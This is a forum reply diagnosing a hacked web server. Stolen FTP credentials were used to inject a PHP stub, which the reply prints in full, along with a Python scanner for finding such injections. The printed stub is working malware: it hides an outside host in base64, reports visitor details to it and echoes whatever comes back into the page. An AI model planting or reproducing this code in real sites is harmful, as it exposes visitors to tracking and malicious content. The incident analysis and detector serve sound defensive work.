@ntoupin
Thank you for granting me access to your server's CPanel.
The reason why I requested this access was that since the incident you reported was a very recent one, if your server was indeed compromised, the web server's access logs would contain clues about the intrusion.
As it happens, your FTP log shows clearly such activity on the 17th of March.
IP address 72.44.80.94 logged in through your FTP credentials and made changes to several files on your server (I am PMing you a list of all such files as some of them are still present on the server).
The modified files have this piece of code injected -
Code:
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)
    &&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)
    &&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)
    &&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)
    &&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){
            // Create bot analitics
            $stCurlLink = base64_decode(
                'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
The base64-encoded string aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw leads up to http://adveconfirm.com/, a classified high-risk site that serves up malware (Google for aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw and you'll find a slew of sites being affected by this trojan - most of them in the current month).
That clears up the mystery then.
Your local machine is infected and the trojan is using your FTP name/password to make modifications to PHP files on your server.
Please sanitize your machine, reset all your FTP accounts and change your FTP client.
Hope this helps. Thanks.
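As an added defender-side example (not part of the post above), a small Python scanner that finds PHP files carrying a base64_decode() literal which decodes to a URL, the trick the injected stub uses to hide its beacon host, and reports which of the stub's other markers (the $sRetry guard, curl_init/curl_exec, echoing the response) are present in the same file. The sample PHP input is constructed for the test and only reuses the encoded string quoted in the post.

```python
import base64
import re
from pathlib import Path
from typing import Dict, List, Optional
from urllib.parse import urlparse

# base64_decode('...') with a literal argument; \s* tolerates the line break
# between the call and its argument that the injected stub uses.
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# Other tell-tale fragments of the stub: guard variable, outbound cURL, echoed response.
MARKERS = ("$sRetry", "curl_init", "curl_exec", "echo $sResult")

# Constructed sample modelled on the posted stub (not the full original file).
SAMPLE = """<?php
if (!isset($sRetry)) { global $sRetry; $sRetry = 1;
$stCurlLink = base64_decode(
  'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
$stCurlHandle = curl_init($stCurlLink);
$sResult = @curl_exec($stCurlHandle); echo $sResult; }
"""

def decode_literal(b64: str) -> Optional[str]:
    """Strictly decode a base64 literal; return None if it is not clean ASCII text."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
        return raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_php_source(src: str) -> List[Dict]:
    """Return one finding per base64_decode() literal that hides an http(s) URL."""
    findings = []
    for m in B64_CALL.finditer(src):
        decoded = decode_literal(m.group(1))
        if not decoded:
            continue
        url = urlparse(decoded)
        if url.scheme in ("http", "https") and url.netloc:
            findings.append({"offset": m.start(), "encoded": m.group(1),
                             "url": decoded, "host": url.netloc,
                             "markers": [k for k in MARKERS if k in src]})
    return findings

def scan_tree(root: str) -> Dict[str, List[Dict]]:
    """Walk a web root and map each suspicious .php path to its findings."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php_source(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits
```

Running scan_tree() over a copy of the document root gives the list of files to clean, and the "host" field gives the beacon destination to block or search for in outbound proxy logs.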